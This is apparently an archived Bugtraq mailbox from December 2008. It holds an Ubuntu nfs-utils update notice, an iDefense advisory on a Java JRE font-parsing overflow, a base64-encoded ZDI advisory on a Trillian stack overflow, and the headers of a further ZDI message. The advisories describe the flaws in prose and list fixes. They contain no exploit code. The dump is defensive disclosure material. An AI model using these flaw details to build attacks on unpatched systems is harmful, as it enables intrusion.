===========================================================
Ubuntu Security Notice USN-687-1          December 04, 2008
nfs-utils vulnerability
CVE-2008-4552
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nfs-kernel-server               1:1.0.7-3ubuntu2.1

Ubuntu 7.10:
  nfs-kernel-server               1:1.1.1~git-20070709-3ubuntu1.1

Ubuntu 8.04 LTS:
  nfs-kernel-server               1:1.1.2-2ubuntu2.2

Ubuntu 8.10:
  nfs-kernel-server               1:1.1.2-4ubuntu1.1

After a standard system upgrade you need to restart nfs services to effect
the necessary changes.

Details follow:

It was discovered that nfs-utils did not properly enforce netgroup
restrictions when using TCP Wrappers. Remote attackers could bypass the
netgroup restrictions enabled by the administrator and possibly gain
access to sensitive information.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.diff.gz
      Size/MD5:    26729 5926412b5a7d5318b1b90747cade6294
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.dsc
      Size/MD5:      698 28b88a044214b04388c55c9e206b48c5
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7.orig.tar.gz
      Size/MD5:   401155 73d8af4367c79f31f68a4ca45422fd17

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:   105890 d8e004d18150e3d6e91575e91b9f3c0c
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:   125960 7ddc8bb36714d4ee3db12ce91adbda22
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:    45058 d7f5a96c16456e520a28e0c0cb31cb0c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:    94970 37cc41d6a9ad5505cb32528f14ec647f
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:   112816 e47956631dcb0c8980cd0f72a4e8428e
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:    43208 c0a0ff484719033e7be7ef166d54602f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:   107416 aac5f08b6f0f1fb5dea98a574d129225
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:   123988 dac1ae13e726e5e8bdca56aae8ab2a23
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:    44786 b65159109f7d2f0678350194be9b25c8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:    96252 8628208ebf8634aeb657c1f99c34ec83
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:   114508 a96b1eab0b5a39e0062ad2c1592c2bd6
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:    44092 fffba1487c5b3660c592bfe6e5bdc935

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.diff.gz
      Size/MD5:    30941 387a16c1bfc126fe5228b7cd7f895b47
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.dsc
      Size/MD5:     1041 ee2f5835d47387259a1ffc509a1c800e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709.orig.tar.gz
      Size/MD5:  1207377 0c1a357290f5f233543bc942c0a006ad

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_amd64.deb
      Size/MD5:   187718 a21ea0964e11dc7437b31c8a24136a4e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_amd64.deb
      Size/MD5:   158258 5245d20a87b1f265d699082fd3465cf0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_i386.deb
      Size/MD5:   176422 90dcb97b35a35e59de12e1432c1ab276
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_i386.deb
      Size/MD5:   148016 9f1a96121a13d0c89fed88ff4651600c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_lpia.deb
      Size/MD5:   174424 09722999f8b92441488357e7d51b78be
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_lpia.deb
      Size/MD5:   147538 3983e3fa6588d37d350cd99441b6c2eb

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb
      Size/MD5:   196470 d8ac43aff7c7099db1751dbe7e7064dc
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb
      Size/MD5:   164396 668269dd69cbc4c3f51510b4fa41e9ef

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_sparc.deb
      Size/MD5:   179480 3e647339bec5baa0f94fd87a5569d8fa
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_sparc.deb
      Size/MD5:   149530 072323ce17f01390d48928254953af97

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.diff.gz
      Size/MD5:    35143 8595826433437ca8d573aadecec55b9e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.dsc
      Size/MD5:     1022 c62bbac19283a7958350d308197562fe
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz
      Size/MD5:   797386 76ee9274c2b867839427eba91b327f03

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_amd64.deb
      Size/MD5:   203396 e8caf55e52bd09522c911658c9208e0a
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_amd64.deb
      Size/MD5:   161652 0b2da0a86933e493142827ee3491f041

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_i386.deb
      Size/MD5:   190380 3365b806f003547556784dc460854acf
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_i386.deb
      Size/MD5:   150442 ae44f68055ff09b377dda8f77e7d7369

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_lpia.deb
      Size/MD5:   190708 56cff37c459c9bacecc0e19eac96493b
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_lpia.deb
      Size/MD5:   150870 0fa925b4b0417a78b81fd437978469ab

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_powerpc.deb
      Size/MD5:   212528 a92ea0106bf861d99eb2bcbb0e41e49c
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_powerpc.deb
      Size/MD5:   167720 2efce3bec09f1c42f577071a597236cb

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_sparc.deb
      Size/MD5:   193568 c82d3d388b1839ce31464b2941f9c9a3
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_sparc.deb
      Size/MD5:   151834 6028d63bf61670986dd3ac84d82f8f7e

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.diff.gz
      Size/MD5:    36776 80b7806275d3318009e26cdd4f21e80e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.dsc
      Size/MD5:     1426 d54ccf3d5cc03325778b2197597eb3b4
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz
      Size/MD5:   797386 76ee9274c2b867839427eba91b327f03

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_amd64.deb
      Size/MD5:   206234 8fade4ffc3b54967b451601ebe3cd783
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_amd64.deb
      Size/MD5:   163432 52da66c1d20b506f83794d1116d7197f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_i386.deb
      Size/MD5:   191928 daf9c6e085ae1dc0677dd86c7946aac9
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_i386.deb
      Size/MD5:   151532 87df37c719bd84c7520b0dfa86b9587d

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_lpia.deb
      Size/MD5:   190668 8d2b6e20721ce687cb179b755e36d680
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_lpia.deb
      Size/MD5:   151770 701f49fcee4e0d9c4db0ddba416a80bf

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_powerpc.deb
      Size/MD5:   210084 3cddb9b535c4266bc418d83c3c68e817
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_powerpc.deb
      Size/MD5:   165774 e797caaae77e93b657884c8076da8742

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_sparc.deb
      Size/MD5:   195372 3026036061bc3138387bb29a81dc4836
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_sparc.deb
      Size/MD5:   153086 ccddafa24f7ce6182616c995b2c90603



--=-laBLNv0Bj6mHnNzKqIPi
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkk4Wa4ACgkQLMAs/0C4zNo7tgCfVl5pE2DwqAoVfve03dc2SJuv
pd8An0TlgFtvmsPXzAX1imPEJo8tnDC7
=4vNV
-----END PGP SIGNATURE-----

--=-laBLNv0Bj6mHnNzKqIPi--

From - Thu Dec  4 18:27:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d38
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38831-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 496B437402F
for <lists@securityspace.com>; Thu,  4 Dec 2008 18:20:09 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9997F236FC7; Thu,  4 Dec 2008 15:56:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8983 invoked from network); 4 Dec 2008 22:20:16 -0000
Message-ID: <49385B1A.4020506@idefense.com>
Date: Thu, 04 Dec 2008 17:35:06 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing
 Integer Overflow Vulnerability
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

The Sun Java JRE is Sun's implementation of the Java runtime. For more
information, see the vendor's site found at the following link.

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Sun
Microsystems Inc.'s Java JRE could allow an attacker to execute
arbitrary code with the privileges of the current user.

The vulnerability exists within the font parsing code in the JRE. As
part of its font API, the JRE provides the ability to load a font from
a remote URL. Various types of fonts are supported, one of which is the
TrueType format font. The vulnerability occurs when parsing various
structures in TrueType font files. During parsing, values are taken
from the file, and without being properly validated, used in operations
that calculate the number of bytes to allocate for heap buffers. The
calculations can overflow, resulting in a potentially exploitable heap
overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context
of the currently logged on user. To exploit this vulnerability, a
targeted user must load a malicious web page created by an attacker. An
attacker typically accomplishes this via social engineering or injecting
content into compromised, trusted sites.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun
Microsystem Inc.'s Java JRE version 1.6.0_05 for Windows. Previous
versions may also be affected.

V. WORKAROUND

There is a potential workaround for the vulnerability, but it renders
the JRE unusable. It is possible to use the cacls program to change the
file permissions on fontmanager.dll. This will prevent the vulnerable
library from loading. However, this workaround has a serious impact on
the functionality of the JRE. When a webpage attempts to load an
applet, the JRE will abort with a runtime error, and the browser will
close.

VI. VENDOR RESPONSE

Sun Microsystem Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

07/31/2008  Initial Vendor Notification
08/01/2008  Initial Vendor Reply
10/21/2008  Additional Vendor Feedback
11/26/2008  Additional Vendor Feedback
12/02/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Sebastian Apelt
(webmaster@buzzworld.org).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
~ There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJOFsZbjs6HoxIfBkRAkAXAKCustwzLXcOKMcDJ1sZ0GonmW4F8ACg6Dva
mqtkKX2/C9fA7aiyNDRtgbA=Oo+F
-----END PGP SIGNATURE-----

From - Fri Dec  5 10:58:24 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d61
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38832-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 692B1EEFF9
for <lists@securityspace.com>; Fri,  5 Dec 2008 10:56:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6E412236F5E; Fri,  5 Dec 2008 08:42:06 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16174 invoked from network); 5 Dec 2008 00:01:42 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFECFD3465.BAF87148-ON88257516.00014EAE-86257516.0001A103@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Thu, 4 Dec 2008 18:17:48 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/04/2008 04:17:52 PM,
Serialize complete at 12/04/2008 04:17:52 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA3NzogVHJpbGxpYW4gQUlNIElNRyBUYWcgUGFyc2luZyBTdGFjayBPdmVyZmxvdyBW
dWxuZXJhYmlsaXR5DQpodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbS9hZHZpc29yaWVz
L1pESS0wOC0wNzcNCkRlY2VtYmVyIDQsIDIwMDgNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoNCkNl
cnVsZWFuIFN0dWRpb3MNCg0KLS0gQWZmZWN0ZWQgUHJvZHVjdHM6DQpDZXJ1bGVhbiBTdHVkaW9z
IFRyaWxsaWFuDQoNCi0tIFZ1bG5lcmFiaWxpdHkgRGV0YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0
eSBhbGxvd3MgcmVtb3RlIGF0dGFja2VycyB0byBleGVjdXRlIGFyYml0cmFyeSBjb2RlIG9uDQp2
dWxuZXJhYmxlIGluc3RhbGxhdGlvbnMgb2YgQ2VydWxlYW4gU3R1ZGlvcyBUcmlsbGlhbi4gQXV0
aGVudGljYXRpb24gaXMNCm5vdCByZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0
eS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhpc3RzIHdpdGhpbiB0aGUgdG9vbHRpcCBwcm9jZXNz
aW5nIGNvZGUgZm9yDQpUcmlsbGlhbi4gV2hlbiBjcmVhdGluZyBhIHRvb2x0aXAgZm9yIGFuIGlt
YWdlLCB0aGUgYXBwbGljYXRpb24NCmdlbmVyYXRlcyBhbiBYTUwgdGFnIGluY2x1ZGluZyBhIHBy
b3BlcnR5IGNvbnRhaW5pbmcgdGhlIGZpbGVuYW1lLiBUaGlzDQpkYXRhIGlzIHRoZW4gY29waWVk
IGRpcmVjdGx5IGludG8gYSBzdGFjay1iYXNlZCBidWZmZXIgd2l0aG91dCBhbnkNCmxlbmd0aCB2
ZXJpZmljYXRpb25zIHdoaWNoIGNhbiBldmVudHVhbGx5IGxlYWQgdG8gY29kZSBleGVjdXRpb24g
d2l0aA0KdGhlIHByaXZpbGVnZXMgb2YgdGhlIGNsaWVudC4NCg0KLS0gVmVuZG9yIFJlc3BvbnNl
Og0KQ2VydWxlYW4gU3R1ZGlvcyBoYXMgaXNzdWVkIGFuIHVwZGF0ZSB0byBjb3JyZWN0IHRoaXMg
dnVsbmVyYWJpbGl0eS4gTW9yZQ0KZGV0YWlscyBjYW4gYmUgZm91bmQgYXQ6DQoNCmh0dHA6Ly9i
bG9nLmNlcnVsZWFuc3R1ZGlvcy5jb20vP3A9NDA0DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6
DQoyMDA4LTExLTEwIC0gVnVsbmVyYWJpbGl0eSByZXBvcnRlZCB0byB2ZW5kb3INCjIwMDgtMTIt
MDQgLSBDb29yZGluYXRlZCBwdWJsaWMgcmVsZWFzZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6
DQpUaGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGRpc2NvdmVyZWQgYnk6DQogICAgKiBEYW1pYW4gUHV0
DQoNCi0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpOg0KRXN0YWJsaXNoZWQg
YnkgVGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKSByZXByZXNlbnRz
IA0KYSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcgc2VjdXJpdHkgcmVzZWFyY2hl
cnMgZm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVyZWQgdnVsbmVyYWJpbGl0aWVz
Lg0KDQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcgcGFpZCBmb3IgdGhlaXIgc2Vj
dXJpdHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmluZCBtb3JlIGluZm9ybWF0aW9u
IGFuZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20N
Cg0KVGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJlZCB2dWxuZXJhYmlsaXR5IGlu
Zm9ybWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBub3QgcmUtc2VsbCB0aGUgdnVs
bmVyYWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2RlLiBJbnN0ZWFkLCB1cG9uIG5v
dGlmeWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpUaXBwaW5nUG9pbnQgcHJvdmlk
ZXMgaXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rpb24gdGhyb3VnaA0KaXRzIGlu
dHJ1c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0IGRldGFpbHMgcmVnYXJkaW5n
IHRoZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFyZSBub3QgZXhwb3NlZCB0byBh
bnkgcGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBhdGNoIGlzIHB1YmxpY2x5IGF2
YWlsYWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlzdGljIGFpbSBvZiBoZWxwaW5n
IHRvIHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5nUG9pbnQNCnByb3ZpZGVzIHRo
aXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRpYWxseSB0byBzZWN1cml0eQ0K
dmVuZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2ZSBhIHZ1bG5lcmFiaWxpdHkg
cHJvdGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpPdXIgdnVsbmVyYWJpbGl0eSBk
aXNjbG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0Og0KDQogICAgaHR0cDovL3d3
dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNjbG9zdXJlX3BvbGljeS8NCg0K
Q09ORklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVzc2FnZSwgaW5jbHVkaW5nIGFu
eSBhdHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBmb3IgdGhlIHNvbGUgdXNlIG9m
IHRoZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29udGFpbiBjb25maWRlbnRpYWws
IHByb3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0aW9uLg0KQW55IHVuYXV0aG9y
aXplZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlzdHJpYnV0aW9uIGJ5IGFueSAN
CnJlY2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBub3QgdGhlIGludGVuZGVkIHJl
Y2lwaWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kgYWxsIGNvcGllcyBvZiB0aGlz
IG1lc3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGluY2x1ZGVkIGF0dGFjaG1lbnRz
IGFuZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0aW5nIHRoZQ0Kc2VuZGVyIHZp
YSByZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0IHBvc3RtYXN0ZXJAM2NvbS5j
b20uIA0K

From - Fri Dec  5 11:08:25 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d62
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38833-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 47B5AEDC3F
for <lists@securityspace.com>; Fri,  5 Dec 2008 11:06:43 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CDD90236F8D; Fri,  5 Dec 2008 08:44:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16198 invoked from network); 5 Dec 2008 00:01:52 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF05F04043.FED44EA4-ON88257516.00014FDC-86257516.0001A908@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Thu, 4 Dec 2008 18:18:08 -0600
